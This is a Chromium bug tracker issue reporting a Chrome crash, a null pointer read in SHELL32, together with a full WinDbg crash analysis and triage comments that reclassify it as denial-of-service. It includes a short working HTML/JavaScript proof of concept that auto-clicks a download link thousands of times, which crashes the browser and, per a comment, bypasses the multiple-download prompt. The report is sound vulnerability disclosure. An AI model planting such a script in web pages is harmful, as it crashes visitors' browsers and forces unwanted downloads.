Issue metadata
Sign in to add a comment
|
Security: SHELL32!CProperTreeHost::_ConnectToView NULL Pointer Read
Reported by
dillon.b...@gmail.com,
Oct 9 2017
|
||||||||||||||||||||||
Issue description
VULNERABILITY DETAILS
With the script included in this report, it is possible crash Chrome version 61.0.3163.100 on Windows 10 10.0.14393, and more than likely other Chrome versions prior to the one listed in this report (haven't tested other Chrome builds).
On Ubuntu 17.0.4 64-bit it locks up the environment and Chrome hangs (sometimes crashes, but never recovers). By invoking the download dialog window, multiple times, Chrome eats up system resources, stores temporary files (would-be downloads) on the disk, and the user is never able to make a clean exit from the browser and it ultimately crashes with the following exception.
Also, I sent some of my other crashes this evening via chrome://crashes
(2164.ff0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
SHELL32!CProperTreeHost::_ConnectToView+0x1af:
00007ffb`3bb850ab 488b01 mov rax,qword ptr [rcx]
VERSION
Chrome Version: 61.0.3163.100 (Official Build) (64-bit) (cohort: Stable)
Operating System: Windows 10 Home 10.0.14393
Ubuntu 17.04 64-bit 61.0.3163.100 (Official Build) (64-bit)
REPRODUCTION CASE
The following trigger will reproduce the issue. I've tested on Windows 10 and Debian Linux
<html>
<p id="demo"></p>
<script>
var a = document.createElement('a');
a.download = 'download';
a.href = "file.zip";
var text = "";
var buff = "";
var i;
for (i = 0; i < 10000; i++) {
buff += " " * i;
text += buff;
text += "<br>";
a.click();
}
document.getElementById("demo").innerHTML = text;
</script>
</html>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State: [see link above: stack trace, registers, exception record]
(2164.ff0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
SHELL32!CProperTreeHost::_ConnectToView+0x1af:
00007ffb`3bb850ab 488b01 mov rax,qword ptr [rcx] ds:00000000`00000000=????????????????
0:596> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Users\tester\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileSyncShell64.dll -
GetUrlPageData2 (WinHttp) failed: 12002.
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
FAULTING_IP:
SHELL32!CProperTreeHost::_ConnectToView+1af
00007ffb`3bb850ab 488b01 mov rax,qword ptr [rcx]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffb3bb850ab (SHELL32!CProperTreeHost::_ConnectToView+0x00000000000001af)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000000
Parameter[1]: 0000000000000000
Attempt to read from address 0000000000000000
FAULTING_THREAD: 0000285c
DEFAULT_BUCKET_ID: NULL_POINTER_READ
PROCESS_NAME: chrome.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000000
EXCEPTION_PARAMETER2: 0000000000000000
FOLLOWUP_IP:
SHELL32!CProperTreeHost::_ConnectToView+1af
00007ffb`3bb850ab 488b01 mov rax,qword ptr [rcx]
READ_ADDRESS: 0000000000000000
WATSON_BKT_PROCSTAMP: 59c30ceb
WATSON_BKT_PROCVER: 61.0.3163.100
PROCESS_VER_PRODUCT: Google Chrome
WATSON_BKT_MODULE: SHELL32.dll
WATSON_BKT_MODSTAMP: 59b0d382
WATSON_BKT_MODOFFSET: 350ab
WATSON_BKT_MODVER: 10.0.14393.1715
MODULE_VER_PRODUCT: Microsoft® Windows® Operating System
BUILD_VERSION_STRING: 10.0.14393.1198 (rs1_release_sec.170427-1353)
MODLIST_WITH_TSCHKSUM_HASH: 7da7f6933478707b75a328e21bd929704193f903
MODLIST_SHA1_HASH: 3ccf75c7f42b8607e3aa044ad00823313e63f708
NTGLOBALFLAG: 0
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 784
DUMP_TYPE: fe
ANALYSIS_SESSION_HOST: DESKTOP-CAAPA7D
ANALYSIS_SESSION_TIME: 10-09-2017 15:05:23.0565
ANALYSIS_VERSION: 10.0.15063.468 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: ENU
PROBLEM_CLASSES:
ID: [0n292]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0xff0]
Frame: [0] : SHELL32!CProperTreeHost::_ConnectToView
ID: [0n264]
Type: [INVALID_POINTER_READ]
Class: Primary
Scope: BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0xff0]
Frame: [0] : SHELL32!CProperTreeHost::_ConnectToView
ID: [0n279]
Type: [NULL_POINTER_READ]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [0x2164]
TID: [0xff0]
Frame: [0] : SHELL32!CProperTreeHost::_ConnectToView
BUGCHECK_STR: APPLICATION_FAULT_NULL_POINTER_READ_INVALID_POINTER_READ
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
LAST_CONTROL_TRANSFER: from 00007ffb3bb84bb8 to 00007ffb3bb850ab
STACK_TEXT:
000000c7`db3eb670 00007ffb`3bb84bb8 : 00000281`de0b0ac8 00007ffb`3aa83289 00000281`de0b0ac8 00000281`de0b0a48 : SHELL32!CProperTreeHost::_ConnectToView+0x1af
000000c7`db3eb6e0 00007ffb`3bb87847 : 00000000`00000000 00000281`d7fca610 00000281`d7fca708 00000281`d7fca6d8 : SHELL32!CProperTreeHost::SetSite+0x48
000000c7`db3eb720 00007ffb`3aa85169 : 00000000`80004005 00000281`b564d1e8 00000000`80004005 00000281`bacc25f0 : SHELL32!CProperTreeModuleInner::SetSite+0xc7
000000c7`db3eb790 00007ffb`3bb887ba : 00000281`903bb6d0 00000281`9033adb0 00000281`d7fca6d8 00007ffb`3bb8a660 : shcore!IUnknown_SetSite+0x49
000000c7`db3eb7d0 00007ffb`3bb88574 : 00000281`00000000 00007ffb`3bb88eb0 00000281`b564d1e8 00007ffb`3bb8a660 : SHELL32!DUI_WalkIUnknownElements+0x41a
000000c7`db3eb880 00007ffb`3bb88574 : 00000281`00000001 00007ffb`3bb88eb0 00000281`b564d1e8 00007ffb`3bb8a660 : SHELL32!DUI_WalkIUnknownElements+0x1d4
000000c7`db3eb930 00007ffb`3bb88574 : 00000281`00000000 00007ffb`3bb88eb0 00000281`b564d1e8 00000281`b564d1e0 : SHELL32!DUI_WalkIUnknownElements+0x1d4
000000c7`db3eb9e0 00007ffb`3bc14f00 : 00000281`00000001 00007ffb`3bb88eb0 00000281`b564d1e8 00007ffb`00000005 : SHELL32!DUI_WalkIUnknownElements+0x1d4
000000c7`db3eba90 00007ffb`3bc15b6d : 00000281`b564d1e0 00007ffb`3bbd2b20 00000281`b564d1d0 00000000`00000000 : SHELL32!CDUIViewFrame::SetShellView+0x110
000000c7`db3ebb50 00007ffb`3bc8630d : 00000000`00013dc8 00007ffb`3a4c7523 00000281`ddc87308 0000000c`00000000 : SHELL32!CDUIViewFrame::SetLayoutDefinition+0x56d
000000c7`db3ebca0 00007ffb`3ac56569 : 00000281`c2f0d000 00000281`c2f0d000 00000281`da9fa130 00000000`0000032b : SHELL32!CExplorerBrowser::RefreshViewFrame+0x5d
000000c7`db3ebce0 00007ffb`3ac55a24 : 00000281`ddc87308 00000281`c2f0d000 00000281`c2f0d000 00000281`e3b0e510 : COMDLG32!CFileOpenSave::_PokeViewFrame+0x39
000000c7`db3ebd10 00007ffb`3ac4819d : 000000c7`db3ec9b0 00000000`00000000 00000000`00000000 00000000`00000001 : COMDLG32!CFileOpenSave::_InitOpenSaveDialog+0x19a4
000000c7`db3ec8b0 00007ffb`3d1e5177 : 00000000`00000001 000000c7`db3ed208 00000000`00000000 00000000`00000001 : COMDLG32!CFileOpenSave::s_OpenSaveDlgProc+0x19d
000000c7`db3ed0b0 00007ffb`3d1e4766 : 00000000`00000000 00007ffb`3ac48000 00000000`00000110 00007ffb`3d597e73 : USER32!UserCallDlgProcCheckWow+0x173
000000c7`db3ed190 00007ffb`3d1e4686 : 00000281`c2f0d000 00000000`00000110 00000000`00000000 ffffffff`eb0a4c09 : USER32!DefDlgProcWorker+0xc6
000000c7`db3ed250 00007ffb`3d1e1c24 : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00040002 : USER32!DefDlgProcW+0x36
000000c7`db3ed290 00007ffb`3d1e125e : 00000281`85b169f0 00007ffb`3d615e50 00000000`00153d94 00007ffb`3d615e50 : USER32!UserCallWinProcCheckWow+0x274
000000c7`db3ed3f0 00007ffb`3d1ea221 : 00000000`00000000 00007ffb`3ac48000 00000000`00122c1e 00000281`85b169f0 : USER32!SendMessageWorker+0x20e
000000c7`db3ed480 00007ffb`3d1fe209 : 00000000`000b12fe 00000000`00000000 00000000`000b12fe 00000000`00000001 : USER32!InternalCreateDialog+0x971
000000c7`db3ed630 00007ffb`3d1fe0c2 : 00000281`bb54a4f0 00000000`000b12fe 00007ffb`3ac48000 00007ffb`3ac40000 : USER32!InternalDialogBox+0x125
000000c7`db3ed690 00007ffb`3d1fe058 : 00000000`00000000 000000c7`db3ed810 00000281`c2f0d000 00000000`00000000 : USER32!DialogBoxIndirectParamAorW+0x52
000000c7`db3ed6d0 00007ffb`3ac534e5 : 00000000`00000000 00000281`b4fa6240 000000c7`db3ed810 00000281`c2f0d000 : USER32!DialogBoxIndirectParamW+0x18
000000c7`db3ed710 00007ffb`3aca73f0 : 00000000`00000000 00000281`c2f0d008 00000000`00000000 000000c7`db3eef00 : COMDLG32!CFileOpenSave::Show+0x615
000000c7`db3eda40 00007ffb`3aca5ef4 : 00000000`00000000 000000c7`00000001 000000c7`db3edb20 00000281`e7b39fe0 : COMDLG32!_InvokeNewFileOpenSave+0xf0
000000c7`db3edaa0 00007ffb`3ac9f4c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000281`c2f0d008 : COMDLG32!_CreateNewFileOpenSaveInProc+0xe8
000000c7`db3edaf0 00007ffb`3ac837c7 : 00000000`00000000 000000c7`db3edbd0 00000000`00000001 00000281`93f9ada8 : COMDLG32!NewGetFileName+0x15e
000000c7`db3edb50 00007ffb`3ac8407f : 00000000`00000000 000000c7`db3eef00 000000c7`db3eed70 000000c7`db3eef00 : COMDLG32!GetFileName+0xff
000000c7`db3edbb0 00007ffa`f8e82d0b : 000000c7`db3eed70 00000281`00000000 00000000`00000000 000000c7`db3eef00 : COMDLG32!GetSaveFileNameW+0x5f
000000c7`db3eec70 00007ffa`f86c41b3 : 00000000`00000000 00000000`00000000 00000281`93f9ad48 00000281`980b8cc0 : chrome!ChromeSelectFileDialogFactory::BlockingGetSaveFileName+0x5b
000000c7`db3eee20 00007ffa`f86c3b83 : 00000281`93f9ad20 00000281`93f9ad20 00000281`abd444c0 00007ffa`f9f207b0 : chrome!`anonymous namespace'::SelectFileDialogImpl::SaveFileAsWithFilter+0x1d3
000000c7`db3ff030 00007ffa`f7cb1bc2 : 000000c7`db3ff328 00000002`903fb754 00000281`93f9acf0 00000000`00000000 : chrome!`anonymous namespace'::SelectFileDialogImpl::ExecuteSelectFile+0xdb
000000c7`db3ff260 00007ffa`f7c54266 : 00007ffa`f9babd38 00007ffb`3d5b683e 000031b4`01b8c5e1 00007ffb`3d5e8067 : chrome!base::debug::TaskAnnotator::RunTask+0x1a2
000000c7`db3ff410 00007ffa`f7c54dc3 : 00000281`a64c68d0 00000281`a615bff0 00000000`00000010 00000281`855f0cc0 : chrome!base::MessageLoop::RunTask+0x1f6
000000c7`db3ff570 00007ffa`f7cb2141 : 00000281`00000155 00000000`00000000 00007ffa`f86c3944 00007ffa`f9babd38 : chrome!base::MessageLoop::DoWork+0x553
000000c7`db3ff770 00007ffa`f7cb1dc4 : 00000281`a615bff0 00000281`a64c68d0 000000c7`db3ff850 00007ffa`f7c5c52b : chrome!base::MessagePumpForUI::DoRunLoop+0x71
000000c7`db3ff7e0 00007ffa`f7c84719 : 000000c7`db3ff910 00000002`903fb408 00000281`a9d06750 00000281`a9d06750 : chrome!base::MessagePumpWin::Run+0x54
000000c7`db3ff830 00007ffa`f7c4fe04 : 00000000`00000ff0 00000281`a615bff0 00000000`00000000 00000281`a615bff0 : chrome!base::RunLoop::Run+0x69
000000c7`db3ff8e0 00007ffa`f7c32800 : 00000000`00000ff0 00000000`00000ff0 00000281`a7ed5560 00000000`0000595c : chrome!base::Thread::ThreadMain+0x1d4
000000c7`db3ff9b0 00007ffb`3d458364 : 00000000`0000595c 00000000`0000595c 00000000`00000000 00000000`00000000 : chrome!base::`anonymous namespace'::ThreadFunc+0xf0
000000c7`db3ffa10 00007ffb`3d5d7091 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
000000c7`db3ffa40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
THREAD_SHA1_HASH_MOD_FUNC: 1125158608539c1c09333bbbae9f0d38a7e14506
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: d5cc908385b836fc35c94e458a13ed0814faf10a
THREAD_SHA1_HASH_MOD: fd3a967f77ad9d4e1e8d6879381fd9d754a6d8b7
FAULT_INSTR_CODE: 48018b48
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: SHELL32!CProperTreeHost::_ConnectToView+1af
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: SHELL32
IMAGE_NAME: SHELL32.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 59b0d382
STACK_COMMAND: ~596s ; kb
FAILURE_BUCKET_ID: NULL_POINTER_READ_c0000005_SHELL32.dll!CProperTreeHost::_ConnectToView
BUCKET_ID: APPLICATION_FAULT_NULL_POINTER_READ_INVALID_POINTER_READ_SHELL32!CProperTreeHost::_ConnectToView+1af
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: SHELL32.dll
BUCKET_ID_IMAGE_STR: SHELL32.dll
FAILURE_MODULE_NAME: SHELL32
BUCKET_ID_MODULE_STR: SHELL32
FAILURE_FUNCTION_NAME: CProperTreeHost::_ConnectToView
BUCKET_ID_FUNCTION_STR: CProperTreeHost::_ConnectToView
BUCKET_ID_OFFSET: 1af
BUCKET_ID_MODTIMEDATESTAMP: 59b0d382
BUCKET_ID_MODCHECKSUM: 153f536
BUCKET_ID_MODVER_STR: 10.0.14393.1715
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_NULL_POINTER_READ_INVALID_POINTER_READ_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: SHELL32.dll!CProperTreeHost::_ConnectToView
WATSON_STAGEONE_URL: http://watson.microsoft.com/StageOne/chrome.exe/61.0.3163.100/59c30ceb/SHELL32.dll/10.0.14393.1715/59b0d382/c0000005/000350ab.htm?Retriage=1
TARGET_TIME: 2017-10-09T06:06:09.000Z
OSBUILD: 14393
OSSERVICEPACK: 1198
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS Personal
USER_LCID: 0
OSBUILD_TIMESTAMP: 2017-04-28 08:48:56
BUILDDATESTAMP_STR: 170427-1353
BUILDLAB_STR: rs1_release_sec
BUILDOSVER_STR: 10.0.14393.1198
ANALYSIS_SESSION_ELAPSED_TIME: 10750
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:null_pointer_read_c0000005_shell32.dll!cpropertreehost::_connecttoview
FAILURE_ID_HASH: {564ca407-b74d-b740-9f68-6eb189e57da6}
Followup: MachineOwner
---------
,
Oct 9 2017
Using code to automatically click the <A> seems to be a simple way to circumvent the "Ask when a site tries to download files automatically after the first file (recommended)" setting from chrome://settings/content/automaticDownloads. When you open the POC, it appears to attempt to invoke a file download 10000 times in parallel which inevitably fails in spectacular fashion. The |text| and |buff| manipulation in the POC doesn't seem to be necessary to cause a crash.
,
Oct 9 2017
Thanks for the report. Removing security labels since this is a DoS. Please see https://chromium.googlesource.com/chromium/src/+/master/docs/security/faq.md#are-denial-of-service-issues-considered-security-bugs
,
Oct 9 2017
Thank you both for the information and quick feedback. Noted on faq DoS.
,
Oct 12 2017
,
Oct 13 2017
Circumvention of the multiple download prompt is similar to Issue 446084 .
,
Oct 13 2017
|
|||||||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||||||
Comment 1 by dillon.b...@gmail.com
, Oct 9 201753.7 KB
53.7 KB View Download